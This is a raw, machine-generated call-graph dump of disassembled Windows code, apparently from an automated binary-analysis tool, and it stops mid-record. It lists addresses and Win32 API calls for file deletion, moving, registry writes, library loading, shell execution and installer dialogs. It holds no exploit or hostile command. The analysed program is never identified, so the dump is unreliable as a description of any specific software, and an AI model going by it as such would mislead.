8521->8495 8522 4054c8 8523 4054d3 InvalidateRect 8522->8523 8526 4054df 8522->8526 8523->8526 8524 4053ec SendMessageW 8529 405402 8524->8529 8525->8524 8525->8529 8526->8503 8527 404e4c 24 API calls 8526->8527 8527->8503 8528 405476 SendMessageW SendMessageW 8528->8529 8529->8522 8529->8528 8530->8521 8531->8485 7616 401946 7617 401948 7616->7617 7618 402dab 21 API calls 7617->7618 7619 40194d 7618->7619 7622 405c63 7619->7622 7658 405f2e 7622->7658 7625 405ca2 7627 405dc2 7625->7627 7672 406557 lstrcpynW 7625->7672 7626 405c8b DeleteFileW 7654 401956 7626->7654 7627->7654 7690 4068b4 FindFirstFileW 7627->7690 7629 405cc8 7630 405cdb 7629->7630 7631 405cce lstrcatW 7629->7631 7673 405e72 lstrlenW 7630->7673 7632 405ce1 7631->7632 7635 405cf1 lstrcatW 7632->7635 7637 405cfc lstrlenW FindFirstFileW 7632->7637 7635->7637 7637->7627 7657 405d1e 7637->7657 7640 405da5 FindNextFileW 7643 405dbb FindClose 7640->7643 7640->7657 7641 405c1b 5 API calls 7644 405dfd 7641->7644 7643->7627 7645 405e01 7644->7645 7646 405e17 7644->7646 7649 4055dc 28 API calls 7645->7649 7645->7654 7648 4055dc 28 API calls 7646->7648 7648->7654 7651 405e0e 7649->7651 7650 405c63 64 API calls 7650->7657 7652 406317 40 API calls 7651->7652 7652->7654 7653 4055dc 28 API calls 7653->7640 7655 4055dc 28 API calls 7655->7657 7657->7640 7657->7650 7657->7653 7657->7655 7677 406557 lstrcpynW 7657->7677 7678 405c1b 7657->7678 7686 406317 MoveFileExW 7657->7686 7696 406557 lstrcpynW 7658->7696 7660 405f3f 7697 405ed1 CharNextW CharNextW 7660->7697 7663 405c83 7663->7625 7663->7626 7664 406805 5 API calls 7670 405f55 7664->7670 7665 405f86 lstrlenW 7666 405f91 7665->7666 7665->7670 7667 405e26 3 API calls 7666->7667 7669 405f96 GetFileAttributesW 7667->7669 7668 4068b4 2 API calls 7668->7670 7669->7663 7670->7663 7670->7665 7670->7668 7671 405e72 2 API calls 7670->7671 7671->7665 7672->7629 7674 405e80 7673->7674 7675 405e92 7674->7675 7676 405e86 CharPrevW 7674->7676 7675->7632 7676->7674 7676->7675 7677->7657 7703 406022 GetFileAttributesW 7678->7703 7681 405c36 RemoveDirectoryW 7684 405c44 7681->7684 7682 405c3e DeleteFileW 7682->7684 7683 405c48 7683->7657 7684->7683 7685 405c54 SetFileAttributesW 7684->7685 7685->7683 7687 40632b 7686->7687 7689 406338 7686->7689 7706 40619d 7687->7706 7689->7657 7691 4068ca FindClose 7690->7691 7692 405de7 7690->7692 7691->7692 7692->7654 7693 405e26 lstrlenW CharPrevW 7692->7693 7694 405e42 lstrcatW 7693->7694 7695 405df1 7693->7695 7694->7695 7695->7641 7696->7660 7698 405eee 7697->7698 7700 405f00 7697->7700 7699 405efb CharNextW 7698->7699 7698->7700 7702 405f24 7699->7702 7701 405e53 CharNextW 7700->7701 7700->7702 7701->7700 7702->7663 7702->7664 7704 405c27 7703->7704 7705 406034 SetFileAttributesW 7703->7705 7704->7681 7704->7682 7704->7683 7705->7704 7707 4061f3 GetShortPathNameW 7706->7707 7708 4061cd 7706->7708 7710 406312 7707->7710 7711 406208 7707->7711 7733 406047 GetFileAttributesW CreateFileW 7708->7733 7710->7689 7711->7710 7713 406210 wsprintfA 7711->7713 7712 4061d7 CloseHandle GetShortPathNameW 7712->7710 7714 4061eb 7712->7714 7715 406594 21 API calls 7713->7715 7714->7707 7714->7710 7716 406238 7715->7716 7734 406047 GetFileAttributesW CreateFileW 7716->7734 7718 406245 7718->7710 7719 406254 GetFileSize GlobalAlloc 7718->7719 7720 406276 7719->7720 7721 40630b CloseHandle 7719->7721 7722 4060ca ReadFile 7720->7722 7721->7710 7723 40627e 7722->7723 7723->7721 7735 405fac lstrlenA 7723->7735 7726 406295 lstrcpyA 7729 4062b7 7726->7729 7727 4062a9 7728 405fac 4 API calls 7727->7728 7728->7729 7730 4062ee SetFilePointer 7729->7730 7731 4060f9 WriteFile 7730->7731 7732 406304 GlobalFree 7731->7732 7732->7721 7733->7712 7734->7718 7736 405fed lstrlenA 7735->7736 7737 405ff5 7736->7737 7738 405fc6 lstrcmpiA 7736->7738 7737->7726 7737->7727 7738->7737 7739 405fe4 CharNextA 7738->7739 7739->7736 8156 4015c6 8157 402dab 21 API calls 8156->8157 8158 4015cd 8157->8158 8159 405ed1 4 API calls 8158->8159 8173 4015d6 8159->8173 8160 401636 8162 401668 8160->8162 8163 40163b 8160->8163 8161 405e53 CharNextW 8161->8173 8166 401423 28 API calls 8162->8166 8164 401423 28 API calls 8163->8164 8165 401642 8164->8165 8175 406557 lstrcpynW 8165->8175 8172 401660 8166->8172 8167 405b05 2 API calls 8167->8173 8169 405b22 5 API calls 8169->8173 8170 40164f SetCurrentDirectoryW 8170->8172 8171 40161c GetFileAttributesW 8171->8173 8173->8160 8173->8161 8173->8167 8173->8169 8173->8171 8174 405aab 2 API calls 8173->8174 8174->8173 8175->8170 8349 404646 lstrlenW 8350 404665 8349->8350 8351 404667 WideCharToMultiByte 8349->8351 8350->8351 8176 4049c7 8177 4049f3 8176->8177 8178 404a04 8176->8178 8237 405b9b GetDlgItemTextW 8177->8237 8180 404a10 GetDlgItem 8178->8180 8186 404a6f 8178->8186 8182 404a24 8180->8182 8181 4049fe 8184 406805 5 API calls 8181->8184 8185 404a38 SetWindowTextW 8182->8185 8190 405ed1 4 API calls 8182->8190 8183 404b53 8187 404d02 8183->8187 8242 405b9b GetDlgItemTextW 8183->8242 8184->8178 8238 4044d6 8185->8238 8186->8183 8186->8187 8192 406594 21 API calls 8186->8192 8260 40453d 8187->8260 8198 404a2e 8190->8198 8195 404ae3 SHBrowseForFolderW 8192->8195 8193 404b83 8196 405f2e 18 API calls 8193->8196 8194 404a54 8199 4044d6 22 API calls 8194->8199 8195->8183 8200 404afb CoTaskMemFree 8195->8200 8201 404b89 8196->8201 8198->8185 8204 405e26 3 API calls 8198->8204 8202 404a62 8199->8202 8203 405e26 3 API calls 8200->8203 8243 406557 lstrcpynW 8201->8243 8241 40450b SendMessageW 8202->8241 8206 404b08 8203->8206 8204->8185 8209 404b3f SetDlgItemTextW 8206->8209 8213 406594 21 API calls 8206->8213 8208 404a68 8211 40694b 5 API calls 8208->8211 8209->8183 8210 404ba0 8212 40694b 5 API calls 8210->8212 8211->8186 8220 404ba7 8212->8220 8214 404b27 lstrcmpiW 8213->8214 8214->8209 8217 404b38 lstrcatW 8214->8217 8215 404be8 8244 406557 lstrcpynW 8215->8244 8217->8209 8218 404bef 8219 405ed1 4 API calls 8218->8219 8221 404bf5 GetDiskFreeSpaceW 8219->8221 8220->8215 8224 405e72 2 API calls 8220->8224 8226 404c40 8220->8226 8223 404c19 MulDiv 8221->8223 8221->8226 8223->8226 8224->8220 8225 404cb1 8228 404cd4 8225->8228 8230 40140b 2 API calls 8225->8230 8226->8225 8245 404e4c 8226->8245 8256 4044f8 EnableWindow 8228->8256 8230->8228 8232 404cb3 SetDlgItemTextW 8232->8225 8233 404ca3 8248 404d83 8233->8248 8234 404cf0 8234->8187 8257 404920 8234->8257 8237->8181 8239 406594 21 API calls 8238->8239 8240 4044e1 SetDlgItemTextW 8239->8240 8240->8194 8241->8208 8242->8193 8243->8210 8244->8218 8246 404d83 24 API calls 8245->8246 8247 404c9e 8246->8247 8247->8232 8247->8233 8249 404d9c 8248->8249 8250 406594 21 API calls 8249->8250 8251 404e00 8250->8251 8252 406594 21 API calls 8251->8252 8253 404e0b 8252->8253 8254 406594 21 API calls 8253->8254 8255 404e21 lstrlenW wsprintfW SetDlgItemTextW 8254->8255 8255->8225 8256->8234 8258 404933 SendMessageW 8257->8258 8259 40492e 8257->8259 8258->8187 8259->8258 8261 404555 GetWindowLongW 8260->8261 8270 404600 8260->8270 8262 40456a 8261->8262 8261->8270 8263 404597 GetSysColor 8262->8263 8264 40459a 8262->8264 8262->8270 8263->8264 8265 4045a0 SetTextColor 8264->8265 8266 4045aa SetBkMode 8264->8266 8265->8266 8267 4045c2 GetSysColor 8266->8267 8268 4045c8 8266->8268 8267->8268 8269 4045cf SetBkColor 8268->8269 8271 4045d9 8268->8271 8269->8271 8271->8270 8272 4045f3 CreateBrushIndirect 8271->8272 8273 4045ec DeleteObject 8271->8273 8272->8270 8273->8272 7333 401c48 7355 402d89 7333->7355 7335 401c4f 7336 402d89 21 API calls 7335->7336 7337 401c5c 7336->7337 7338 401c71 7337->7338 7358 402dab 7337->7358 7340 401c81 7338->7340 7341 402dab 21 API calls 7338->7341 7342 401cd8 7340->7342 7343 401c8c 7340->7343 7341->7340 7344 402dab 21 API calls 7342->7344 7345 402d89 21 API calls 7343->7345 7346 401cdd 7344->7346 7347 401c91 7345->7347 7348 402dab 21 API calls 7346->7348 7349 402d89 21 API calls 7347->7349 7350 401ce6 FindWindowExW 7348->7350 7351 401c9d 7349->7351 7354 401d08 7350->7354 7352 401cc8 SendMessageW 7351->7352 7353 401caa SendMessageTimeoutW 7351->7353 7352->7354 7353->7354 7364 406594 7355->7364 7357 402d9e 7357->7335 7359 402db7 7358->7359 7360 406594 21 API calls 7359->7360 7361 402dd8 7360->7361 7362 402de4 7361->7362 7363 406805 5 API calls 7361->7363 7362->7338 7363->7362 7365 40659f 7364->7365 7366 4067e6 7365->7366 7369 4067b7 lstrlenW 7365->7369 7373 4066b0 GetSystemDirectoryW 7365->7373 7374 406594 15 API calls 7365->7374 7375 4066c6 GetWindowsDirectoryW 7365->7375 7376 406594 15 API calls 7365->7376 7377 406758 lstrcatW 7365->7377 7380 406728 SHGetPathFromIDListW CoTaskMemFree 7365->7380 7381 406425 7365->7381 7386 40694b GetModuleHandleA 7365->7386 7392 406805 7365->7392 7401 40649e wsprintfW 7365->7401 7402 406557 lstrcpynW 7365->7402 7367 4067ff 7366->7367 7403 406557 lstrcpynW 7366->7403 7367->7357 7369->7365 7373->7365 7374->7369 7375->7365 7376->7365 7377->7365 7380->7365 7404 4063c4 7381->7404 7384 406489 7384->7365 7385 406459 RegQueryValueExW RegCloseKey 7385->7384 7387 406971 GetProcAddress 7386->7387 7388 406967 7386->7388 7390 406980 7387->7390 7408 4068db GetSystemDirectoryW 7388->7408 7390->7365 7391 40696d 7391->7387 7391->7390 7393 406812 7392->7393 7395 406888 7393->7395 7396 40687b CharNextW 7393->7396 7399 406867 CharNextW 7393->7399 7400 406876 CharNextW 7393->7400 7411 405e53 7393->7411 7394 40688d CharPrevW 7394->7395 7395->7394 7398 4068ae 7395->7398 7396->7393 7396->7395 7398->7365 7399->7393 7400->7396 7401->7365 7402->7365 7403->7367 7405 4063d3 7404->7405 7406 4063dc RegOpenKeyExW 7405->7406 7407 4063d7 7405->7407 7406->7407 7407->7384 7407->7385 7409 4068fd wsprintfW LoadLibraryExW 7408->7409 7409->7391 7412 405e59 7411->7412 7413 405e6f 7412->7413 7414 405e60 CharNextW 7412->7414 7413->7393 7414->7412 7479 4028c9 7480 4028cf 7479->7480 7481 4028d7 FindClose 7480->7481 7482 402c2f 7480->7482 7481->7482 7483 4014cb 7486 4055dc 7483->7486 7487 4055f7 7486->7487 7496 4014d2 7486->7496 7488 405613 lstrlenW 7487->7488 7489 406594 21 API calls 7487->7489 7490 405621 lstrlenW 7488->7490 7491 40563c 7488->7491 7489->7488 7492 405633 lstrcatW 7490->7492 7490->7496 7493 405642 SetWindowTextW 7491->7493 7494 40564f 7491->7494 7492->7491 7493->7494 7495 405655 SendMessageW SendMessageW SendMessageW 7494->7495 7494->7496 7495->7496 7740 405550 7741 405560 7740->7741 7742 405574 7740->7742 7744 405566 7741->7744 7745 4055bd 7741->7745 7743 40557c IsWindowVisible 7742->7743 7751 405593 7742->7751 7743->7745 7746 405589 7743->7746 7753 404522 7744->7753 7747 4055c2 CallWindowProcW 7745->7747 7756 404e91 SendMessageW 7746->7756 7750 405570 7747->7750 7751->7747 7761 404f11 7751->7761 7754 40453a 7753->7754 7755 40452b SendMessageW 7753->7755 7754->7750 7755->7754 7757 404ef0 SendMessageW 7756->7757 7758 404eb4 GetMessagePos ScreenToClient SendMessageW 7756->7758 7759 404ee8 7757->7759 7758->7759 7760 404eed 7758->7760 7759->7751 7760->7757 7770 406557 lstrcpynW 7761->7770 7763 404f24 7771 40649e wsprintfW 7763->7771 7765 404f2e 7772 40140b 7765->7772 7769 404f3e 7769->7745 7770->7763 7771->7765 7773 401389 2 API calls 7772->7773 7774 401420 7773->7774 7775 406557 lstrcpynW 7774->7775 7775->7769 8391 4016d1 8392 402dab 21 API calls 8391->8392 8393 4016d7 GetFullPathNameW 8392->8393 8394 4016f1 8393->8394 8400 401713 8393->8400 8397 4068b4 2 API calls 8394->8397 8394->8400 8395 401728 GetShortPathNameW 8396 402c2f 8395->8396 8398 401703 8397->8398 8398->8400 8401 406557 lstrcpynW 8398->8401 8400->8395 8400->8396 8401->8400 8352 401e53 GetDC 8353 402d89 21 API calls 8352->8353 8354 401e65 GetDeviceCaps MulDiv ReleaseDC 8353->8354 8355 402d89 21 API calls 8354->8355 8356 401e96 8355->8356 8357 406594 21 API calls 8356->8357 8358 401ed3 CreateFontIndirectW 8357->8358 8359 40263d 8358->8359 7776 402955 7777 402dab 21 API calls 7776->7777 7778 402961 7777->7778 7779 402977 7778->7779 7780 402dab 21 API calls 7778->7780 7781 406022 2 API calls 7779->7781 7780->7779 7782 40297d 7781->7782 7804 406047 GetFileAttributesW CreateFileW 7782->7804 7784 40298a 7785 402a40 7784->7785 7788 4029a5 GlobalAlloc 7784->7788 7789 402a28 7784->7789 7786 402a47 DeleteFileW 7785->7786 7787 402a5a 7785->7787 7786->7787 7788->7789 7790 4029be 7788->7790 7791 4032b9 35 API calls 7789->7791 7805 4034ea SetFilePointer 7790->7805 7793 402a35 CloseHandle 7791->7793 7793->7785 7794 4029c4 7795 4034d4 ReadFile 7794->7795 7796 4029cd GlobalAlloc 7795->7796 7797 402a11 7796->7797 7798 4029dd 7796->7798 7800 4060f9 WriteFile 7797->7800 7799 4032b9 35 API calls 7798->7799 7803 4029ea 7799->7803 7801 402a1d GlobalFree 7800->7801 7801->7789 7802 402a08 GlobalFree 7802->7797 7803->7802 7804->7784 7805->7794 7497 4014d7 7498 402d89 21 API calls 7497->7498 7499 4014dd Sleep 7498->7499 7501 402c2f 7499->7501 8696 403fd7 8697 404150 8696->8697 8698 403fef 8696->8698 8700 404161 GetDlgItem GetDlgItem 8697->8700 8701 4041a1 8697->8701 8698->8697 8699 403ffb 8698->8699 8702 404006 SetWindowPos 8699->8702 8703 404019 8699->8703 8704 4044d6 22 API calls 8700->8704 8705 4041fb 8701->8705 8715 401389 2 API calls 8701->8715 8702->8703 8707 404022 ShowWindow 8703->8707 8708 404064 8703->8708 8709 40418b SetClassLongW 8704->8709 8706 404522 SendMessageW 8705->8706 8722 40414b 8705->8722 8740 40420d 8706->8740 8710 404042 GetWindowLongW 8707->8710 8711 40410e 8707->8711 8712 404083 8708->8712 8713 40406c DestroyWindow 8708->8713 8714 40140b 2 API calls 8709->8714 8710->8711 8718 40405b ShowWindow 8710->8718 8717 40453d 8 API calls 8711->8717 8719 404088 SetWindowLongW 8712->8719 8720 404099 8712->8720 8766 40445f 8713->8766 8714->8701 8716 4041d3 8715->8716 8716->8705 8721 4041d7 SendMessageW 8716->8721 8717->8722 8718->8708 8719->8722 8720->8711 8725 4040a5 GetDlgItem 8720->8725 8721->8722 8723 40140b 2 API calls 8723->8740 8724 404461 DestroyWindow EndDialog 8724->8766 8727 4040d3 8725->8727 8728 4040b6 SendMessageW IsWindowEnabled 8725->8728 8726 404490 ShowWindow 8726->8722 8729 4040d8 8727->8729 8731 4040e0 8727->8731 8732 404127 SendMessageW 8727->8732 8733 4040f3 8727->8733 8728->8722 8728->8727 8729->8711 8734 4044af SendMessageW 8729->8734 8730 406594 21 API calls 8730->8740 8731->8729 8731->8732 8732->8711 8735 404110 8733->8735 8736 4040fb 8733->8736 8734->8711 8738 40140b 2 API calls 8735->8738 8737 40140b 2 API calls 8736->8737 8737->8729 8738->8729 8739 4044d6 22 API calls 8739->8740 8740->8722 8740->8723 8740->8724 8740->8730 8740->8739 8741 4044d6 22 API calls 8740->8741 8757 4043a1 DestroyWindow 8740->8757 8742 404288 GetDlgItem 8741->8742 8743 4042a5 ShowWindow EnableWindow 8742->8743 8744 40429d 8742->8744 8767 4044f8 EnableWindow 8743->8767 8744->8743 8746 4042cf EnableWindow 8751 4042e3 8746->8751 8747 4042e8 GetSystemMenu EnableMenuItem SendMessageW 8748 404318 SendMessageW 8747->8748 8747->8751 8748->8751 8750 403fb8 22 API calls 8750->8751 8751->8747 8751->8750 8768 40450b SendMessageW 8751->8768 8769 406557 lstrcpynW 8751->8769 8753 404347 lstrlenW 8754 406594 21 API calls 8753->8754 8755 40435d SetWindowTextW 8754->8755 8756 401389 2 API calls 8755->8756 8756->8740 8758 4043bb CreateDialogParamW 8757->8758 8757->8766 8759 4043ee 8758->8759 8758->8766 8760 4044d6 22 API calls 8759->8760 8761 4043f9 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 8760->8761 8762 401389 2 API calls 8761->8762 8763 40443f 8762->8763 8763->8722 8764 404447 ShowWindow 8763->8764 8765 404522 SendMessageW 8764->8765 8765->8766 8766->8722 8766->8726 8767->8746 8768->8751 8769->8753 7806 40195b 7807 402dab 21 API calls 7806->7807 7808 401962 lstrlenW 7807->7808 7809 40263d 7808->7809 7502 4020dd 7503 4020ef 7502->7503 7505 4021a1 7502->7505 7504 402dab 21 API calls 7503->7504 7506 4020f6 7504->7506 7507 401423 28 API calls 7505->7507 7508 402dab 21 API calls 7506->7508 7513 4022fb 7507->7513 7509 4020ff 7508->7509 7510 402115 LoadLibraryExW 7509->7510 7511 402107 GetModuleHandleW 7509->7511 7510->7505 7512 402126 7510->7512 7511->7510 7511->7512 7522 4069ba 7512->7522 7516 402170 7518 4055dc 28 API calls 7516->7518 7517 402137 7520 402147 7517->7520 7527 401423 7517->7527 7518->7520 7520->7513 7521 402193 FreeLibrary 7520->7521 7521->7513 7530 406579 WideCharToMultiByte 7522->7530 7524 4069d7 7525 402131 7524->7525 7526 4069de GetProcAddress 7524->7526 7525->7516 7525->7517 7526->7525 7528 4055dc 28 API calls 7527->7528 7529 401431 7528->7529 7529->7520 7530->7524 8532 402b5e 8533 402bb0 8532->8533 8534 402b65 8532->8534 8535 40694b 5 API calls 8533->8535 8537 402d89 21 API calls 8534->8537 8539 402bae 8534->8539 8536 402bb7 8535->8536 8538 402dab 21 API calls 8536->8538 8540 402b73 8537->8540 8542 402bc0 8538->8542 8541 402d89 21 API calls 8540->8541 8546 402b7f 8541->8546 8542->8539 8543 402bc4 IIDFromString 8542->8543 8543->8539 8544 402bd3 8543->8544 8544->8539 8550 406557 lstrcpynW 8544->8550 8549 40649e wsprintfW 8546->8549 8547 402bf0 CoTaskMemFree 8547->8539 8549->8539 8550->8547 8551 401761 8552 402dab 21 API calls 8551->8552 8553 401768 8552->8553 8554 406076 2 API calls 8553->8554 8555 40176f 8554->8555 8555->8555 7810 401d62 7811 402d89 21 API calls 7810->7811 7812 401d73 SetWindowLongW 7811->7812 7813 402c2f 7812->7813 7531 4028e3 7532 4028eb 7531->7532 7533 4028ef FindNextFileW 7532->7533 7536 402901 7532->7536 7534 402948 7533->7534 7533->7536 7537 406557 lstrcpynW 7534->7537 7537->7536 8770 403be7 8771 403bf2 8770->8771 8772 403bf6 8771->8772 8773 403bf9 GlobalAlloc 8771->8773 8773->8772 7814 401568 7815 402ba9 7814->7815 7818 40649e wsprintfW 7815->7818 7817 402bae 7818->7817 7819 40196d 7820 402d89 21 API calls 7819->7820 7821 401974 7820->7821 7822 402d89 21 API calls 7821->7822 7823 401981 7822->7823 7824 402dab 21 API calls 7823->7824 7825 401998 lstrlenW 7824->7825 7826 4019a9 7825->7826 7827 4019ea 7826->7827 7831 406557 lstrcpynW 7826->7831 7829 4019da 7829->7827 7830 4019df lstrlenW 7829->7830 7830->7827 7831->7829 8360 40166f 8361 402dab 21 API calls 8360->8361 8362 401675 8361->8362 8363 4068b4 2 API calls 8362->8363 8364 40167b 8363->8364 8402 402af0 8403 402d89 21 API calls 8402->8403 8404 402af6 8403->8404 8405 406594 21 API calls 8404->8405 8406 402933 8404->8406 8405->8406 8407 4026f1 8408 402d89 21 API calls 8407->8408 8412 402700 8408->8412 8409 40274a ReadFile 8409->8412 8419 40283d 8409->8419 8410 4060ca ReadFile 8410->8412 8411 406128 5 API calls 8411->8412 8412->8409 8412->8410 8412->8411 8413 40278a MultiByteToWideChar 8412->8413 8414 40283f 8412->8414 8416 4027b0 SetFilePointer MultiByteToWideChar 8412->8416 8417 402850 8412->8417 8412->8419 8413->8412 8420 40649e wsprintfW 8414->8420 8416->8412 8418 402871 SetFilePointer 8417->8418 8417->8419 8418->8419 8420->8419 8556 401774 8557 402dab 21 API calls 8556->8557 8558 40177b 8557->8558 8559 4017a3 8558->8559 8560 40179b 8558->8560 8595 406557 lstrcpynW 8559->8595 8594 406557 lstrcpynW 8560->8594 8563 4017a1 8567 406805 5 API calls 8563->8567 8564 4017ae 8565 405e26 3 API calls 8564->8565 8566 4017b4 lstrcatW 8565->8566 8566->8563 8583 4017c0 8567->8583 8568 4068b4 2 API calls 8568->8583 8569 406022 2 API calls 8569->8583 8571 4017d2 CompareFileTime 8571->8583 8572 401892 8574 4055dc 28 API calls 8572->8574 8573 401869 8575 4055dc 28 API calls 8573->8575 8592 40187e 8573->8592 8576 40189c 8574->8576 8575->8592 8577 4032b9 35 API calls 8576->8577 8578 4018af 8577->8578 8579 4018c3 SetFileTime 8578->8579 8580 4018d5 CloseHandle 8578->8580 8579->8580 8582 4018e6 8580->8582 8580->8592 8581 406594 21 API calls 8581->8583 8584 4018eb 8582->8584 8585 4018fe 8582->8585 8583->8568 8583->8569 8583->8571 8583->8572 8583->8573 8583->8581 8586 406557 lstrcpynW 8583->8586 8591 405bb7 MessageBoxIndirectW 8583->8591 8596 406047 GetFileAttributesW CreateFileW 8583->8596 8587 406594 21 API calls 8584->8587 8588 406594 21 API calls 8585->8588 8586->8583 8589 4018f3 lstrcatW 8587->8589 8590 401906 8588->8590 8589->8590 8590->8592 8593 405bb7 MessageBoxIndirectW 8590->8593 8591->8583 8593->8592 8594->8563 8595->8564 8596->8583 7538 4014f5 SetForegroundWindow 7539 402c2f 7538->7539 8365 401a77 8366 402d89 21 API calls 8365->8366 8367 401a80 8366->8367 8368 402d89 21 API calls 8367->8368 8369 401a25 8368->8369 7832 401578 7833 401591 7832->7833 7834 401588 ShowWindow 7832->7834 7835 402c2f 7833->7835 7836 40159f ShowWindow 7833->7836 7834->7833 7836->7835 8774 4023f9 8775 402dab 21 API calls 8774->8775 8776 402408 8775->8776 8777 402dab 21 API calls 8776->8777 8778 402411 8777->8778 8779 402dab 21 API calls 8778->8779 8780 40241b GetPrivateProfileStringW 8779->8780 8781 401ffb 8782 402dab 21 API calls 8781->8782 8783 402002 8782->8783 8784 4068b4 2 API calls 8783->8784 8785 402008 8784->8785 8787 402019 8785->8787 8788 40649e wsprintfW 8785->8788 8788->8787 8597 401b7c 8598 402dab 21 API calls 8597->8598 8599 401b83 8598->8599 8600 402d89 21 API calls 8599->8600 8601 401b8c wsprintfW 8600->8601 8602 402c2f 8601->8602 7415 401000 7416 401037 BeginPaint GetClientRect 7415->7416 7417 40100c DefWindowProcW 7415->7417 7419 4010f3 7416->7419 7422 401179 7417->7422 7420 401073 CreateBrushIndirect FillRect DeleteObject 7419->7420 7421 4010fc 7419->7421 7420->7419 7423 401102 CreateFontIndirectW 7421->7423 7424 401167 EndPaint 7421->7424 7423->7424 7425 401112 6 API calls 7423->7425 7424->7422 7425->7424 8274 404980 8275 404990 8274->8275 8276 4049b6 8274->8276 8277 4044d6 22 API calls 8275->8277 8278 40453d 8 API calls 8276->8278 8279 40499d SetDlgItemTextW 8277->8279 8280 4049c2 8278->8280 8279->8276 8421 401680 8422 402dab 21 API calls 8421->8422 8423 401687 8422->8423 8424 402dab 21 API calls 8423->8424 8425 401690 8424->8425 8426 402dab 21 API calls 8425->8426 8427 401699 MoveFileW 8426->8427 8428 4016ac 8427->8428 8434 4016a5 8427->8434 8429 4068b4 2 API calls 8428->8429 8432 4022fb 8428->8432 8431 4016bb 8429->8431 8430 401423 28 API calls 8430->8432 8431->8432 8433 406317 40 API calls 8431->8433 8433->8434 8434->8430 7837 401503 7838 401508 7837->7838 7840 401520 7837->7840 7839 402d89 21 API calls 7838->7839 7839->7840 8370 401a04 8371 402dab 21 API calls 8370->8371 8372 401a0b 8371->8372 8373 402dab 21 API calls 8372->8373 8374 401a14 8373->8374 8375 401a1b lstrcmpiW 8374->8375 8376 401a2d lstrcmpW 8374->8376 8377 401a21 8375->8377 8376->8377 8603 402304 8604 402dab 21 API calls 8603->8604 8605 40230a 8604->8605 8606 402dab 21 API calls 8605->8606 8607 402313 8606->8607 8608 402dab 21 API calls 8607->8608 8609 40231c 8608->8609 8610 4068b4 2 API calls 8609->8610 8611 402325 8610->8611 8612 402336 lstrlenW lstrlenW 8611->8612 8613 402329 8611->8613 8615 4055dc 28 API calls 8612->8615 8614 4055dc 28 API calls 8613->8614 8616 402331 8613->8616 8614->8616 8617 402374 SHFileOperationW 8615->8617 8617->8613 8617->8616 8281 401d86 8282 401d99 GetDlgItem 8281->8282 8283 401d8c 8281->8283 8285 401d93 8282->8285 8284 402d89 21 API calls 8283->8284 8284->8285 8286 401dda GetClientRect LoadImageW SendMessageW 8285->8286 8287 402dab 21 API calls 8285->8287 8289 401e38 8286->8289 8291 401e44 8286->8291 8287->8286 8290 401e3d DeleteObject 8289->8290 8289->8291 8290->8291 8789 402388 8790 40238f 8789->8790 8793 4023a2 8789->8793 8791 406594 21 API calls 8790->8791 8792 40239c 8791->8792 8792->8793 8794 405bb7 MessageBoxIndirectW 8792->8794 8794->8793 7426 402c0a SendMessageW 7427 402c24 InvalidateRect 7426->7427 7428 402c2f 7426->7428 7427->7428 8378 40460c lstrcpynW lstrlenW 7540 40248f 7541 402dab 21 API calls 7540->7541 7542 4024a1 7541->7542 7543 402dab 21 API calls 7542->7543 7544 4024ab 7543->7544 7557 402e3b 7544->7557 7547 402c2f 7548 4024e3 7549 4024ef 7548->7549 7552 402d89 21 API calls 7548->7552 7553 40250e RegSetValueExW 7549->7553 7561 4032b9 7549->7561 7550 402dab 21 API calls 7551 4024d9 lstrlenW 7550->7551 7551->7548 7552->7549 7555 402524 RegCloseKey 7553->7555 7555->7547 7558 402e56 7557->7558 7581 4063f2 7558->7581 7563 4032d2 7561->7563 7562 403300 7586 4034d4 7562->7586 7563->7562 7585 4034ea SetFilePointer 7563->7585 7567 40346d 7569 4034af 7567->7569 7573 403471 7567->7573 7568 40331d GetTickCount 7576 403457 7568->7576 7580 40336c 7568->7580 7571 4034d4 ReadFile 7569->7571 7570 4034d4 ReadFile 7570->7580 7571->7576 7572 4034d4 ReadFile 7572->7573 7573->7572 7574 4060f9 WriteFile 7573->7574 7573->7576 7574->7573 7575 4033c2 GetTickCount 7575->7580 7576->7553 7577 4033e7 MulDiv wsprintfW 7578 4055dc 28 API calls 7577->7578 7578->7580 7580->7570 7580->7575 7580->7576 7580->7577 7589 4060f9 WriteFile 7580->7589 7582 406401 7581->7582 7583 4024bb 7582->7583 7584 40640c RegCreateKeyExW 7582->7584 7583->7547 7583->7548 7583->7550 7584->7583 7585->7562 7591 4060ca ReadFile 7586->7591 7590 406117 7589->7590 7590->7580 7592 40330b 7591->7592 7592->7567 7592->7568 7592->7576 7841 402910 7842 402dab 21 API calls 7841->7842 7843 402917 FindFirstFileW 7842->7843 7844 40293f 7843->7844 7848 40292a 7843->7848 7845 402948 7844->7845 7849 40649e wsprintfW 7844->7849 7850 406557 lstrcpynW 7845->7850 7849->7845 7850->7848 7593 401491 7594 4055dc 28 API calls 7593->7594 7595 401498 7594->7595 7851 401911 7852 401948 7851->7852 7853 402dab 21 API calls 7852->7853 7854 40194d 7853->7854 7855 405c63 71 API calls 7854->7855 7856 401956 7855->7856 7857 401914 7858 402dab 21 API calls 7857->7858 7859 40191b 7858->7859 7862 405bb7 7859->7862 7865 405bcc 7862->7865 7863 401924 7864 405be0 MessageBoxIndirectW 7864->7863 7865->7863 7865->7864 8435 404695 8436 4046ad 8435->8436 8440 4047c7 8435->8440 8441 4044d6 22 API calls 8436->8441 8437 404831 8438 4048fb 8437->8438 8439 40483b GetDlgItem 8437->8439 8442 40453d 8 API calls 8438->8442 8443 404855 8439->8443 8444 4048bc 8439->8444 8440->8437 8440->8438 8445 404802 GetDlgItem SendMessageW 8440->8445 8446 404714 8441->8446 8448 4048f6 8442->8448 8443->8444 8449 40487b SendMessageW LoadCursorW SetCursor 8443->8449 8444->8438 8450 4048ce 8444->8450 8468 4044f8 EnableWindow 8445->8468 8447 4044d6 22 API calls 8446->8447 8452 404721 CheckDlgButton 8447->8452 8469 404944 8449->8469 8454 4048e4 8450->8454 8455 4048d4 SendMessageW 8450->8455 8466 4044f8 EnableWindow 8452->8466 8454->8448 8459 4048ea SendMessageW 8454->8459 8455->8454 8456 40482c 8460 404920 SendMessageW 8456->8460 8459->8448 8460->8437 8461 40473f GetDlgItem 8467 40450b SendMessageW 8461->8467 8463 404755 SendMessageW 8464 404772 GetSysColor 8463->8464 8465 40477b SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 8463->8465 8464->8465 8465->8448 8466->8461 8467->8463 8468->8456 8472 405b7d ShellExecuteExW 8469->8472 8471 4048aa LoadCursorW SetCursor 8471->8444 8472->8471 7596 402896 7597 40289d 7596->7597 7600 402bae 7596->7600 7598 402d89 21 API calls 